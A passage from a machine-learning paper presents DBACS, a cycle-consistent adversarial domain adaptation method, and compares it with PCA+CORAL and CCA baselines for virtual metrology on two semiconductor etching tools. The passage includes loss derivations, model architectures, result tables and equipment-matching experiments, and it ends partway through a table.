D_{S}}\left(F (G\left(x_{S},\theta_{G}\right),\theta_{F})\right)=\mathbf{L}_{x_{S}\sim D_{S} }(F(G(x_{S})),x_{S}); \tag{5}\] \[L_{cycle_{T}}(X_{T}):=L_{F,G,D_{T}}(X_{T})=\mathbf{L}_{x_{T}\sim D_{T}}\left(G (F\left(x_{T},\theta_{F}\right),\theta_{G})\right)=\mathbf{L}_{x_{T}\sim D_{T} }(G(F(x_{T})),x_{T}). \tag{6}\] To give an example we follow the description in Zhu et al. 
(2017) where the \(L_{1}\) norm is used as cycle loss function: \[L_{cycle_{S}}(X_{S})=\mathbf{L}_{x_{S}\sim D_{S}}(F(G(x_{S})),x_ {S})=\mathbf{E}_{x_{S}\sim D_{S}}\left[\left\|F(G(x_{S}))-x_{S}\right\|_{1}\right] \tag{7}\] \[L_{cycle_{T}}(X_{T})=\mathbf{L}_{x_{T}\sim D_{T}}(G(F(x_{T})),x_ {T})=\mathbf{E}_{x_{T}\sim D_{T}}\left[\left\|G(F(x_{T}))-x_{T}\right\|_{1}\right] \tag{8}\] In short, the cycle consistency loss is defined as \[\mathcal{L}_{cyc}(F,G,X_{S},X_{T})=L_{cycles}(X_{S})+L_{cycle_{T}}(X_{T}). \tag{9}\] Here, the optimization goal is to reproduce a bijective mapping so that each \(x_{S}\in X_{S}\) is mapped to \(X_{T}\) and back to \(X_{S}\) with \(F(G(x_{S}))\approx x_{S}\). The same goes for \(x_{T}\in X_{T}\) with \(G(F(x_{T}))\approx x_{T}\). Figure 1: **Graphical representation of the proposed DBACS system** exploiting input data from two non-identical domains. The arrows represent the data flows. An autoencoder shaped aligner can be used for noise reduction especially for homogeneous DA but is not mandatory. Adversarial lossLet \(h_{D_{A}}:X_{S}\to I\), \(h_{D_{B}}:X_{T}\to I\) with \(I=[0,1]\) be two statistical model functions describing respectively the distance of source versus aligned target and target versus aligned source. Let \(h_{D_{A}}\) be parameterized by \(\theta_{D_{A}}\) and let \(D_{A}(x_{S},\theta_{D_{A}})\) be the parameter representation of discriminator A where \(D_{A}\) is the model function with parameters \(\theta_{D_{A}}\) that outputs the prediction for \(x_{S}\in X_{S}\). Let \(h_{D_{B}}\) be parameterized by \(\theta_{D_{B}}\) and let \(D_{B}(x_{T},\theta_{D_{B}})\) be the parameter representation of discriminator B where \(D_{B}\) is the model function with parameters \(\theta_{D_{B}}\) that outputs the prediction for \(x_{T}\in X_{T}\). Then the adversarial loss first for source \(L_{adv_{S}}\) and second for target \(L_{adv_{T}}\) is defined based on a selected loss function \(\mathbf{L}\): \[L_{adv_{S}}(X_{S},X_{T}) :=L_{D_{A},D_{S}}(X_{S})-L_{D_{A},D_{T}}(X_{T})\] \[=\mathbf{L}_{x_{S}\sim D_{S}^{X}}\left(h_{D_{A}}\left(x_{S}\right) \right)-\mathbf{L}_{x_{T}\sim D_{T}^{X}}\left(h_{D_{A}}\left(h_{F}(x_{T}) \right)\right)\] \[=\mathbf{L}_{x_{S}\sim D_{S}^{X}}\left(D_{A}\left(x_{S},\theta_{D _{A}}\right)\right)-\mathbf{L}_{x_{T}\sim D_{T}^{X}}\left(D_{A}\left(F(x_{T}, \theta_{F}),\theta_{D_{A}}\right)\right) \tag{10}\] \[L_{adv_{T}}(X_{S},X_{T}) :=L_{D_{B},D_{T}}(X_{T})-L_{D_{B},D_{S}}(X_{S})\] \[=\mathbf{L}_{x_{T}\sim D_{T}^{X}}\left(h_{D_{B}}\left(x_{T}, \theta_{D_{B}}\right)\right)-\mathbf{L}_{x_{S}\sim D_{S}^{X}}\left(h_{D_{B}} \left(h_{G}(x_{S},\theta_{G}),\theta_{D_{B}}\right)\right) \tag{11}\] The adversarial loss is applied to the output of each discriminator and enables an adversarial training approach (see Gentner et al. (2021), Gulrajani et al. (2017)). For a regression modeling task: Let \(I\subset\mathbb{R}\) or \(I=\mathbb{R}\) and the discriminator a regression model with linear output activation function. 
Then the adversarial loss is defined as \[L_{adv_{S}}(X_{S},X_{T}) =\mathbf{E}_{x_{S}\sim D_{S}}\left[D_{A}\left(x_{S},\theta_{D_{A}} \right)\right]-\mathbb{E}_{x_{T}\sim D_{T}}[(D_{A}(F(x_{T},\theta_{F}),\theta_{ D_{A}}))], \tag{12}\] \[L_{adv_{T}}(X_{S},X_{T}) =\mathbf{E}_{x_{T}\sim D_{T}}\left[D_{B}\left(x_{T},\theta_{D_{B} }\right)\right]-\mathbb{E}_{x_{S}\sim D_{S}}[(D_{B}(G(x_{S},\theta_{G}),\theta _{D_{B}}))], \tag{13}\] where \(\mathbf{E}\) defines the expected value and the loss is an approximation of the Wasserstein distance of two sampled distributions, for details see Gulrajani et al. (2017). RemarkIt is recommended by Zhu et al. (2017) based on Taigman et al. (2017) to add one more additional loss term namely the identity loss. The idea is that if almost identical samples in the other domain occur, the aligner should perform close to an identity function. Since source and target are heterogeneous in our case we do not apply this kind of loss. The training itself happens in an adversarial setting with a two-player game approach. The adversarial training routine includes parallel training of both aligner and both discriminator using adversarial loss plus inclusion of the additional loss terms. For training, two fixed training data sets \(S\) and \(T\) (training samples are drawn i.i.d from \(D_{S}\) and \(D_{T}\)) are used. During the aligners training phase, the adversarial loss is minimized, during discriminator training phase it is maximized (or its negative value minimized).: * The first competitor of the adversarial training is the discriminator \(D_{A}\) trained to distinguish between source and aligned target data meaning optimizing the adversarial source loss. In parallel the discriminator \(D_{B}\) is trained to distinguish between target and aligned source data also meaning optimizing the adversarial target loss. The optimization of the discriminator A and discriminator B loss \(L_{D_{total}}\) is defined as \[\max_{\theta_{D_{A}},\theta_{D_{B}}}L_{D_{total}}(X_{S},X_{T}) =\max_{\theta_{D_{A}}}L_{adv_{S}}(X_{S},X_{T})+\max_{\theta_{D_{B} }}L_{adv_{T}}(X_{S},X_{T})\] \[=\max_{\theta_{D_{A}}}L_{D_{A},D_{S}}(X_{S},\theta_{D_{A}})-L_{D_ {A},D_{T}}(F(X_{T},\theta_{F}),\theta_{D_{A}})\] \[+\max_{\theta_{D_{B}}}L_{D_{B},D_{T}}(X_{T},\theta_{D_{B}})-L_{D_ {B},D_{S}}(G(X_{S},\theta_{G}),\theta_{D_{B}})\] \[=\max_{\theta_{D_{A}}}\mathbf{L}_{x_{S}\in S}\left(D_{A}\left(x_{ S},\theta_{D_{A}}\right)\right)-\mathbf{L}_{x_{T}\in T}\left(D_{A}\left(F(x_{T}, \theta_{F}),\theta_{D_{A}}\right)\right)\] \[+\max_{\theta_{D_{B}}}\mathbf{L}_{x_{T}\in T}\left(D_{B}\left(x_{ T},\theta_{D_{B}}\right)\right)-\mathbf{L}_{x_{S}\in S}\left(D_{B}\left(G(x_{S}, \theta_{G}),\theta_{D_{B}}\right)\right)\] (14) * The second competitor in the adversarial training is the aligner cycle. We define \(L_{A_{total}}\) using the adversarial loss for both aligners and the cycle consistency loss. In case of labeled target data the aligner \(F\) is also updated in order to optimize prediction loss \(L_{P}\) for aligned target data. 
The adversarial part of the aligner losses is set in opposite direction compared to the ones used to update the two discriminator: \[\min_{\theta_{F},\theta_{G}}L_{A_{total}}(X_{S},X_{T}) =\min_{\theta_{F},\theta_{G}}\alpha_{adv_{S}}L_{adv_{S}}\left(X_{S},X_{T}\right)+\lambda_{P}L_{P}\left(F(X_{T})\right)+\lambda_{adv_{T}}L_{adv_{T}} \left(X_{S},X_{T}\right)\] \[=\min_{\theta_{F},\theta_{G}}\left[-\mathbf{L}_{x_{T}\in T}\left(D_{A }\left(F(x_{T},\theta_{F}),\theta_{D_{A}}\right)\right)\right.\] \[+\lambda_{P}\mathbf{L}_{(x_{T},y)\in TL}(P\left(F(x_{T},\theta_{F}), \theta_{P}\right))-\mathbf{L}_{x_{S}\in S}\left(D_{B}\left(G(x_{S},\theta_{G}), \theta_{D_{B}}\right)\right)\] (15) where \(\lambda_{(\cdot)}\) represents the weight assigned to each corresponding loss term. For \(\lambda_{P}=0\) the training happens in an unsupervised setting where no target labels are available. A gradient penalty regularization term is added when updating both aligners following the recommendations of Gulrajani et al. (2017). ### Subspace Alignment using Principle Component Analysis Subspace Alignment (SA), presented by Fernando et al. (2013), linearly aligns subspaces generated by Principle Component Analysis (PCA). SA was introduced as unsupervised DA method for classification task. Overall benefits of SA lies in the simplicity and in the speed of the method while still presenting high accuracy. For heterogeneous domain adaptation, we slightly adapt here the SA approach by first applying PCA separately to source and target and then align the corresponding subspaces using CORrelation ALignment (CORAL). CORAL by Sun et al. (2016) is an unsupervised domain adaptation method that aligns second order statistics of source and target domain. PcaPrinciple Component Analysis (PCA) is a linear transformation of a vector space with respect to its points/vectors. The projection is created in a way that highest occurring variance is represented by the first latent dimension (the so-called first principle component), the second highest variance by the second principle component and so on. Let \(X\) be a vector space, let \(\psi:X\to X^{\prime}\) define the nonlinear principle component transformation to be computed. Then PCA is formalized via \[x^{\prime}=\psi(x)=\Gamma^{T}x \tag{16}\] where \(x^{\prime}\in X^{\prime}\) describes the transformed input, \(\Gamma\) consists of the eigenvectors and is computed via \(\Lambda=\Gamma^{T}\Sigma\Gamma\) where \(\Lambda\) is a diagonal matrix defined by the eigenvalues and \(\Sigma\) is the covariance matrix. PCA is applied to \(X_{S}\) and \(X_{T}\) accordingly resulting in \(S^{\prime}\) and \(T^{\prime}\) as projected input sets. Since PCA is a very well-known method, we refer to Jolliffe (2010) for a more detailed description. CoralLet \(S^{\prime}=\{x^{\prime}_{S_{i}}\}\), \(T^{\prime}=\{x^{\prime}_{T_{i}}\}\) be the PCA projected input sets from the source and target domains. Let \(\Upsilon:X^{\prime}_{S}\to X^{\prime}_{T}\) with \(\Upsilon(X^{\prime}_{S})=X^{\prime}_{S}\ast A\) describe the feature transformation of the source space to the target space. Let \(\mu_{S^{\prime}},\mu_{T^{\prime}}\) be the feature mean of \(S^{\prime}\), \(T^{\prime}\) and \(C_{S^{\prime}},C_{T^{\prime}}\) the corresponding covariance matrices. 
Then, the distance between the covariance matrices (assuming normalized features with zero mean) is minimized by: \[\min_{A}\left\|C_{\hat{S^{\prime}}}-C_{T^{\prime}}\right\|_{F}^{2}=\min_{A} \left\|A^{T}C_{S^{\prime}}A-C^{\prime}_{T}\right\|_{F}^{2}\] where \(A\) is the matrix used in linear transformation that is applied to the source, \(C_{\hat{S^{\prime}}}\) describes the covariance of the transformed source features \(S^{\prime\ast}A\) and \(\left\|\cdot\right\|_{F}^{2}\) denoting the squared Frobenius norm selected as distance metric. It is called CORAL loss. In order to solve this equation, we follow Algorithm 1 in Sun et al. (2016) and compute first the covariance matrices followed by whitening the source and then recoloring it with the target covariance. ### Canonical Correlation Analysis (CCA) Canonical Correlation Analysis (CCA) defines linear transformation for each set of variables such that after the transformation the projected features are maximal correlated. A summary of the descriptions is taken from Hardoon et al. (2004). Let \(S=\{x_{S}\},T=\{x_{T}\}\) be two sample sets wanted to be projected into direction \(w_{S},w_{T}\). Let \(\Phi_{S}:X_{S}\to X^{\prime}_{S}\), \(\Phi_{T}:X_{T}\to X^{\prime}_{T}\) define the linear transformation for each domain. Then: \[\Phi_{S}(S)=S^{{}^{\prime}}=S_{x_{S},w_{S}}=\langle w_{S},x_{S}\rangle,\] \[\Phi_{T}(T)=T^{{}^{\prime}}=T_{x_{T},w_{T}}=\langle w_{T},x_{T}\rangle. \tag{17}\] Specifically, it is looked for \(w_{S},w_{T}\) such that the correlation between the projected vectors is maximised, hence: \[\rho=\max_{w_{S},w_{T}}corr\left(S_{x_{S},w_{S}},T_{x_{T},w_{T}}\right)=\max_ {w_{S},w_{T}}\frac{\langle S_{x_{S},w_{S}},T_{x_{T},w_{T}}\rangle}{\|S_{x_{S},w_{S}}\|\cdot\|T_{x_{T},w_{T}}\|}. \tag{18}\] The previous equation can be reformulated as \[\rho=\max_{w_{S},w_{T}}\frac{w^{\prime}_{S}\mathbb{E}[x_{S}x^{\prime}_{T}]w_{T }}{\sqrt{w^{\prime}_{S}\mathbb{E}[x_{S}x^{\prime}_{S}]w_{S}w^{\prime}_{T} \mathbb{E}[x_{T}x^{\prime}_{T}]w_{T}}} \tag{19}\] with \(\mathbb{E}\) denoting the discrete empirical expectation, \({}^{\prime}\) denotes the transpose of a vector or a matrix and properties of the inner product are used. Using the covariance matrix with \[C=C(x_{S},x_{T})=\mathbb{E}[x_{S}x_{T}]=\begin{bmatrix}C_{x_{S}x_{S}}&C_{x_{T}x_{ S}}\\ C_{x_{S}x_{T}}&C_{x_{T}x_{T}}\end{bmatrix} \tag{20}\] where C is a block matrix with the within-covariance \(C_{x_{S}x_{S}},C_{x_{T}x_{T}}\) and between-covariance matrices \(C_{x_{S}x_{T}},C_{x_{T}x_{S}}\) as entries. Finally the optimization problem can be formulated in the following way: \[\rho=\max_{w_{S},w_{T}}\frac{w_{s}^{\prime}C_{x_{S}x_{T}}w_{T}}{\sqrt{w_{S}^{ \prime}C_{x_{S}x_{S}}}w_{S}w_{T}^{\prime}C_{x_{T}x_{T}}w_{T}} \tag{21}\] By checking that rescaling of \(w_{S},w_{T}\) does not change the problem, it can be maximized subject to \[w_{S}^{\prime}C_{x_{S}x_{S}}w_{S} =1,\] \[w_{T}^{\prime}C_{x_{T}x_{T}}w_{T} =1. \tag{22}\] The formulation of the dual problem is used, hence computing the corresponding Lagrangian L leads to \[L(\lambda,w_{S},w_{T})=w_{s}^{\prime}C_{x_{S}x_{T}}w_{T}-\frac{\lambda_{S}}{2 }(w_{S}^{\prime}C_{x_{S}x_{S}}w_{S}-1)-\frac{\lambda_{T}}{2}(w_{T}^{\prime}C_{ x_{T}x_{T}}w_{T}-1). \tag{23}\] The partial derivatives in the direction of \(w_{S},w_{T}\) are: \[\frac{\partial L}{w_{S}} =C_{x_{S}x_{T}}w_{T}-\lambda_{S}C_{x_{S}x_{S}}w_{S}=0, \tag{24}\] \[\frac{\partial L}{w_{T}} =C_{x_{T}x_{S}}w_{S}-\lambda_{T}C_{x_{T}x_{T}}w_{T}=0. 
\tag{25}\] Multiplying (24) with \(w_{S}^{\prime}\) and (25) with \(w_{T}^{\prime}\) and subtracting one from the other yields \(\lambda:=\lambda_{S}=\lambda_{T}\); assuming \(C_{x_{T}x_{T}}\) is invertible, rearranging the equations and substituting back into the partial derivatives leads to \[C_{x_{S}x_{T}}C_{x_{T}x_{T}}^{-1}C_{x_{T}x_{S}}w_{S}=\lambda^{2}C_{x_{S}x_{S}}w_{S} \tag{26}\] which is equivalent to a generalised eigenproblem of the form \(Ax=\lambda Bx\). Using a Cholesky decomposition, this can be further simplified to a symmetric eigenvalue problem \(Ax=\lambda x\). For a visualization see Figure 2. ## 4 Case Study: Dataset Description and Experimental Settings ### Semiconductor Manufacturing: Etching process and Virtual Metrology Wafers are the basis for every semiconductor manufacturing process. A wafer consists of pure (99.9999%) silicon, has a disc shape and houses several thousand chips (the end product) on average. The specific technology structure of a chip is built up layer by layer on the wafer during a couple of hundred process steps. Each wafer is considered a separate sample in this work. Figure 2: **Visualization of Canonical Correlation Analysis (CCA).** The canonical components of source and target are a weighted combination of corresponding input features. The correlation of the canonical components within the red box is maximized. Similarly to PCA, the number of canonical components can be tuned. Etching is a common process in semiconductor manufacturing and is frequently studied and discussed in semiconductor research and literature, along with chemical vapor deposition and implantation. The etching process removes material from a surface or transfers a structure created during the lithography step to the layer below Hilleringham (1996); May and Spanos (2006). Reactive-ion etching uses a high-frequency alternating energy field applied to the cathode on which the wafer is placed. Positively charged ions in the plasma are accelerated towards the wafer and collide with its surface at high kinetic energy, causing atoms from the wafer's surface to be dislodged from the crystal lattice, resulting in partial physical etching. In addition, a partial chemical reaction occurs due to the highly reactive free radicals. The plasma etching process includes up to ten sub-steps during which input sensors must be adjusted to the target values specified in a recipe. Sensors that measure properties such as chamber pressure, applied high frequency voltage, gas type, gas flow, and wafer temperature, as well as electrode temperature and bias, play a crucial role in achieving the desired wafer properties. End point detection, or the etching time, is one of the most critical aspects of the process, as it is highly sensitive and closely related to other variables such as gases, pressure, current, and temperature. Incorrect etching times, inadequate end point detection, uncontrolled reactions, and interference in the chamber can negatively affect the layer thickness and overall quality and functionality of the wafer. Process monitoring and control are essential for reliable, standardized, and repeatable production processes that produce high-quality products. In this work, we focus on a process control method called virtual metrology (VM) and analyze it through a case study involving an etching process. In general, control quantities are typically measured in metrology stations or tools after the process is completed, using multiple measurements on a sample of wafers. 
Traditional metrology is a univariate or multivariate control system that uses control charts with defined upper and lower control limits to monitor process performance. However, due to cost and time constraints, not all wafers can be physically measured after the process. Virtual metrology (VM) or soft sensing modules utilize data collected by process equipment to model the relationship between wafer properties and process input and feedback sensor measurements. VM techniques allow for the inclusion of non-measured but predicted control measures in order to enhance analysis. VM technologies offer several benefits, including: * _costs and time savings_ due to reduced mandatory measurements; * _quality assurance_ through enhanced and comprehensive monitoring; * _real-time control, assessment and process updates_ in conjunction with Run-to-Run controllers Su et al. (2007); * _data-driven process optimization_ including fault detection, root cause analysis and improved sample selection Feng et al. (2019). ### Data Preparation The data used in this work is collected from two different etching equipment types from the same vendor. The data set is restricted to a specific etching recipe that was transferred from one equipment to the other and now runs regularly on both. Raw sensor measurements in the form of time series data and their corresponding metrology/inline measurements over a period of 3 years are considered. * the older equipment type - with a higher number of samples (\(\sim\)10 000) and the original tool to run the specific recipe - is selected as source; * the newer equipment type - with \(\sim\)6000 data samples - is defined as target. The following preprocessing steps were applied to the collected time series sensor data, with each equipment type treated separately due to the heterogeneous nature of the data: 1. removal of constant features; 2. removal of features that show only small fluctuations that can be detected as noise (variations smaller than \(0.01\)) and a constant behavior underneath the noise; 3. removal of samples showing label outliers based on the interquartile range; 4. removal of samples whose time series length lies below the 25 percent or above the 75 percent quantile of time series lengths; 5. equally distributed upsampling of timestamps and feature values to generate time series of equal length. In total, 33 features for equipment type 1 and 49 for equipment type 2 are finally selected as input features. No significant label shift is detected, see Figure 3. ### Experimental Design Virtual metrology is modeled as a prediction task with sensor data as input mapped to a single continuous metrology value. Due to the heterogeneous nature of the data representations from equipment types 1 and 2, no common model can be used without additional transfer. We present the analysis in the following order: 1. DBACS is trained and tested as a domain adaptation model, using an autoencoder to align the original input features and thereby enable usage of a dedicated pretrained model; 2. PCA and CCA are selected as benchmark models; for the heterogeneous VM task the alignment happens by creating a common (latent) feature space that is then used to train a common model. CORAL on the latent features is tested as a final combination for both PCA and CCA (a minimal sketch of this latent-space benchmark pipeline is given below). 
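To make the second benchmark concrete, the following minimal sketch illustrates a PCA-plus-CORAL latent-space pipeline of the kind described above. It is an illustrative reconstruction rather than the authors' implementation: the array names, the ridge regressor, and the regularization constant are assumptions, and the CORAL step follows the whitening/recoloring recipe of Sun et al. (2016).

```python
import numpy as np
from scipy.linalg import fractional_matrix_power
from sklearn.decomposition import PCA
from sklearn.linear_model import Ridge

def coral(Xs, Xt, eps=1e-5):
    """Align source features to target statistics: whiten with the source
    covariance, then recolor with the target covariance (Sun et al., 2016)."""
    Cs = np.cov(Xs, rowvar=False) + eps * np.eye(Xs.shape[1])
    Ct = np.cov(Xt, rowvar=False) + eps * np.eye(Xt.shape[1])
    W = np.real(fractional_matrix_power(Cs, -0.5))  # whitening matrix
    R = np.real(fractional_matrix_power(Ct, 0.5))   # recoloring matrix
    return Xs @ W @ R

# Placeholder arrays standing in for the flattened (sample*timestep, feature) matrices.
rng = np.random.default_rng(0)
X_src, y_src = rng.normal(size=(500, 33)), rng.normal(size=500)
X_tgt, y_tgt = rng.normal(size=(300, 49)), rng.normal(size=300)

# Separate PCA per equipment type creates a common 10-dimensional latent space.
Z_src = PCA(n_components=10).fit_transform(X_src)
Z_tgt = PCA(n_components=10).fit_transform(X_tgt)

# Align source latent features to the target statistics, then train one common model.
Z_src_aligned = coral(Z_src, Z_tgt)
model = Ridge().fit(np.vstack([Z_src_aligned, Z_tgt]), np.concatenate([y_src, y_tgt]))
print("target MAE:", np.mean(np.abs(model.predict(Z_tgt) - y_tgt)))
```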
For training, distribution comparison and alignment evaluation the following metrics are considered: * Mean absolute error (MAE) is used as performance-based loss; the Adam optimizer is applied for training; * the divergence between data selected from the source and from the target domain is measured with the Fréchet inception distance (FID); * 5-fold cross validation is applied, hence both data sets are split into 5 subsets each, using 4 merged sets as train and 1 as test set per fold. Architectures of all models stay fixed for all 5 folds; * the Pearson correlation of features is tested after alignment. For the correlation analysis we use the function implementation available in the python module _numpy_ Harris et al. (2020), and for PCA and CCA we use the existing function implementations in the python module _scikit-learn_ Pedregosa et al. (2011). For CORAL we use the implementation from the python module _transfertools_ Vincent et al. (2020). Figure 3: **Boxplot of normalized layer thickness from two equipment types.** Boxplot graphs of normalized metrology/inline measurements from both equipment types considered in the analysis. DBACS is trained using the described adversarial training approach. PCA and CCA expect a two-dimensional input, hence we keep the original data and reshape each 3-dimensional sample into a two-dimensional one by treating each value at each time step as a separate sample. The selected number of latent features is based on the variation coverage of both domains. In the following, model details and hyperparameter choices are reported. DBACS: a 1DCNN is chosen since it is simple but has proven to perform well for time series data Gentner et al. (2021). * The predictor consists of 3 convolutional layers (dimension 32, 16, 8 and kernel size 53, 33 and 33), followed by one max pooling layer, a flattening layer and two dense layers (dimension 16 and 1, Leaky ReLU activation except sigmoid output). * The domain discriminators both have the same architecture besides the respective input shape: 3 convolutional layers (dimension 24, 16 and 8, kernel size 17), causal padding and Leaky ReLU activation function, max pooling of size 4 and 2 times 2, followed by a flattening layer and 6 dense layers (dimension 512, 256, 128, 64, 32, 1, Leaky ReLU activation and linear output). * Both aligners consist of 6 convolutional layers, the first 5 followed by a Leaky ReLU activation function; the final output is kept linear. The aligner that maps the target domain to the source domain has filter sizes 48, 42, 36, 32, 32, and the final filter size is set to the number of features of the source domain; the kernel sizes are 37, 37, 37, 37, 57 and 7. Upsampling with size 3 and 2 is done after the 4th and 5th layer block. The aligner that maps the source domain to the target domain has filter sizes 32, 36, 42, 46, 48, and the final filter size is set to the number of features of the target domain; the kernel sizes are also 37, 37, 37, 37, 57 and 7. Upsampling with size 3 and 2 is also done after the 4th and 5th layer block. For an improved initialization both aligners are pretrained separately using the SSIM loss Wang et al. (2004): to this end, we select sample pairs from source and target based on the closest label value. PCA and CORAL: the 3-dimensional input is reshaped into a two-dimensional one by treating each value at each time step as a separate sample. For each equipment type, we select the first 10 principal components in order to cover around \(95\%\) of the variance and to create an input space of the same dimension. 
For equipment type 1 we cover \(97\%\) of the variance and for equipment type 2 we cover \(94\%\). A 1DCNN model with the reduced number of features based on PCA of the source and target domain (reshaped back to 3 dimensions) is used as prediction model. CCA: 27 canonical components (CCs) are kept since this setting shows the most stable results in our experiments. The original data is reshaped from a 3-dimensional input into a two-dimensional one by treating each value at each time step as a separate sample. A 1DCNN model with the reduced number of features based on CCA of the source and target domain (reshaped back to 3 dimensions) is used as prediction model. ## 5 Experimental Results Table 1 shows the average 5-fold CV results for DBACS compared to the dedicated lower-bound values, i.e., the performance errors of dedicated models trained only on source and only on target data. The numbers given in Table 1 confirm the visual convergence seen in the t-SNE plot in Figure 4. This is supported by a Fréchet inception distance (FID) of \(0.01\) for the outer-domain distance after alignment, compared to inner-domain FID distances close to 0 for equipment type 1 as well as for equipment type 2. Next, Figure 5 shows true versus predicted values for different alignment states (randomly initialized aligner, after the pretraining of the aligner, and after DA training with DBACS). Again, the visualization supports the results presented in Table 1: applying the dedicated source model to mapped target data enables high-accuracy predictions. A visualization of both aligners' outputs is presented in Figure 6 and compared to the original domain sensor signals. Next, we present the results of the PCA analysis in Table 2. Optional DA with CORAL on top shows slightly improved results if the model is trained on data from both domains. The FID score for the outer-domain distance after PCA + CORAL on the latent features generated by PCA is significantly lower than before, with \(0.0001\) for train and \(0.001\) for test. Only the first two principal components show a correlation higher than \(r=0.5\). For CCA, the performance is presented in Table 3. Optional DA with CORAL on top shows improved results since model training on both domains is enabled and can be executed using the CCs. The FID score for the outer-domain distance after CCA + CORAL on the latent features generated by CCA is again significantly lower than before, with values very close to \(0\) for train and test. The first five CCs have a correlation higher than \(r=0.5\). \begin{table} \begin{tabular}{l|l|l||l|l} & \multicolumn{2}{c||}{Source domain} & \multicolumn{2}{c}{Target domain} \\ \hline & Train & Test & Train & Test \\ \hline \hline Lower Bound & \(0.084\) & \(0.094\) & \(0.102\) & \(0.128\) \\ \hline DBACS & \(0.084\) & \(0.094\) & \(0.102\) & \(0.131\) \\ \end{tabular} \end{table} Table 1: **DBACS performance errors for source and aligned target.** Source and aligned target data DBACS training and test scores, averaged over 5-fold CV. Target data is mapped to the source domain using the trained aligner \(F\) from DBACS and evaluated after the mapping using the VM prediction model trained on source. Lower-bound prediction models are dedicated, meaning trained only on source train data and evaluated only on source test data, respectively trained only on target train data and evaluated only on target test data. 
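The FID values quoted above summarize how close two sampled feature distributions are. As a point of reference, the following minimal sketch shows one common way such a Fréchet distance can be computed from two feature matrices; the placeholder arrays and the Gaussian assumption are illustrative and do not reproduce the authors' exact evaluation pipeline.

```python
import numpy as np
from scipy.linalg import sqrtm

def frechet_distance(X, Y, eps=1e-6):
    """Frechet distance between two sets of feature vectors (rows = samples),
    modelled as Gaussians: ||mu_x - mu_y||^2 + Tr(Cx + Cy - 2 (Cx Cy)^(1/2))."""
    mu_x, mu_y = X.mean(axis=0), Y.mean(axis=0)
    Cx = np.cov(X, rowvar=False) + eps * np.eye(X.shape[1])
    Cy = np.cov(Y, rowvar=False) + eps * np.eye(Y.shape[1])
    covmean = sqrtm(Cx @ Cy)
    if np.iscomplexobj(covmean):
        covmean = covmean.real  # discard tiny imaginary parts from numerical error
    return float(np.sum((mu_x - mu_y) ** 2) + np.trace(Cx + Cy - 2.0 * covmean))

# Placeholder feature matrices for source and aligned-target samples.
rng = np.random.default_rng(1)
source_feats = rng.normal(size=(200, 16))
aligned_target_feats = rng.normal(loc=0.1, size=(180, 16))
print("FID-style distance:", frechet_distance(source_feats, aligned_target_feats))
```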
## 6 Equipment Matching Experiments Since DBACS provides a methodology that allows parallel training and transfer in both directions - source to target but also target to source - mis- or abnormal behavior detected for aligned data can be compared to normal as well as abnormal data from the source. This kind of comparison enables equipment matching for non-identical equipment with heterogeneous data representations. Figure 4: **T-SNE visualization before and after alignment with DBACS.** Graphical t-SNE representation of source and target domain in different stages of the alignment process: (a) shows features mapped by a randomly initialized aligner, (b) after the pretraining of the aligner and (c) after DA with DBACS is done. The source is colored in blue and contains data from equipment type 1, the target is colored red and contains data from equipment type 2. The axes are dimensionless. The plots show the effect of the adaptation of the input features as DBACS is applied during training: the adaptation brings the distribution of the target domain closer to the source until the target finally overlaps the source domain. Figure 5: True versus predicted scatter plot for DBACS before and after alignment. The graph shows predictions of aligned target data after being mapped to the source space by a randomly initialized aligner, after the pretraining of the aligner, and predictions of aligned target data after DA training with DBACS is done. Only test data is presented; the source test data is colored in blue, the aligned target test data is colored in red. First, we compare source signals with their cycled signals with respect to the signal shape itself, as well as target signals with their cycled target signals. Examples of both are presented in Figure 7. Next, we check differences within the source domain between samples having a high, middle and low prediction value. This helps to better understand the univariate feature behavior for the source. The middle prediction is the preferred and targeted one. Figure 8 shows Euclidean barycenter averages of three example signals from the source domain for low, middle and high label values. Sensor offsets for deviating metrology measurements are clearly visible for some of the signals. For the final equipment matching, we compare the preferred shape of signals from the source domain, meaning signals with metrology measurements close to the target value \(0.5\) (see Figure 8), to corresponding as well as deviating signals from the target domain. To do so, we use DBACS to map selected source signals into the target domain. Different sensor measurements and their Euclidean barycenter averages for groups of low, middle and high metrology measurements are shown in Figure 9 and compared to mapped sensor signals (source to target) corresponding to the middle, i.e., preferred, metrology group in the source domain. \begin{table} \begin{tabular}{c|c|c||c|c} \multicolumn{4}{c}{**VM prediction model performance for PCA based principle components**} \\ & \multicolumn{2}{c||}{Source domain} & \multicolumn{2}{c}{Target domain} \\ \hline & Train MAE & Test MAE & Train MAE & Test MAE \\ \hline \hline PCA(source) & \(0.09\) & \(0.09\) & \(0.32\) & \(0.33\) \\ \hline PCA(target) & \(0.47\) & \(0.47\) & \(0.12\) & \(0.13\) \\ \hline PCA(both) & \(0.10\) & \(0.14\) & \(0.09\) & \(0.14\) \\ \hline PCA+CORAL(both) & \(0.08\) & \(0.09\) & \(0.12\) & \(0.13\) \\ \end{tabular} \end{table} Table 2: **VM prediction model performance for PCA based principle components. 
Results for VM prediction models that are trained with reduced number of latent features that are created via PCA.** Figure 6: Aligner \(F\) and \(G\) visualizations of 2 times 3 raw sensor measurements of both equipment types before and after the corresponding alignment. The graph shows results for trained aligner \(F\) and mapped sensor signals from target to source domain in red and compares it to corresponding original source sensor signals plotted in black. It also shows results from trained aligner \(G\) and mapped sensor signals from source to target domain in blue and compares it to corresponding original target sensor signals plotted in black. A good alignment is visible as well. The x axis shows the timestamps of the sensor signals, y axis the sensor measurement values. ## 7 Conclusion and Future Work The paper presents DBACS, a Deep Learning approach that is able to deal with heterogeneous domain adaptation while allowing comparison of aligned signals for a VM use case in semiconductor manufacturing. Linear transformation methods from subspace alignment and multi-view learning are selected as benchmarks and show comparable results when training with data from both domains is possible. Especially for classification tasks, the correlation within CCA can be further exploited for cross-modal or mate-based retrieval. A big advantage of DBACS is the presented combination of domain adaptation with matching, two of the main approaches for standardization and scalability in the semiconductor field. Envisioned future work could go in the direction of root cause analysis based on the matching results. Another important step could to enrich the data with more equipment for multi-source or multi-target alignment. Other applications from semiconductor manufacturing like predictive maintenance and defect classification could be involved and tested for example against computer vision inspired state-of-the-art transfer learning benchmark models like pseudo-labeling. Since only offline model training is executed (training time is not a critical aspect of VM here), online model training could also be explored in that context. \begin{table} \begin{tabular}{c|c|c||c|c} & \multicolumn{2}{c||}{Source domain} & \multicolumn{2}{c}{Target domain} \\ \hline & Train MAE & Test MAE & Train MAE & Test MAE \\ \hline \hline CCA(source) & \(0.12\) & \(0.13\) & \(0.29\) & \(0.29\) \\ \hline CCA(target) & \(0.29\) & \(0.29\) & \(0.10\) & \(0.14\) \\ \hline 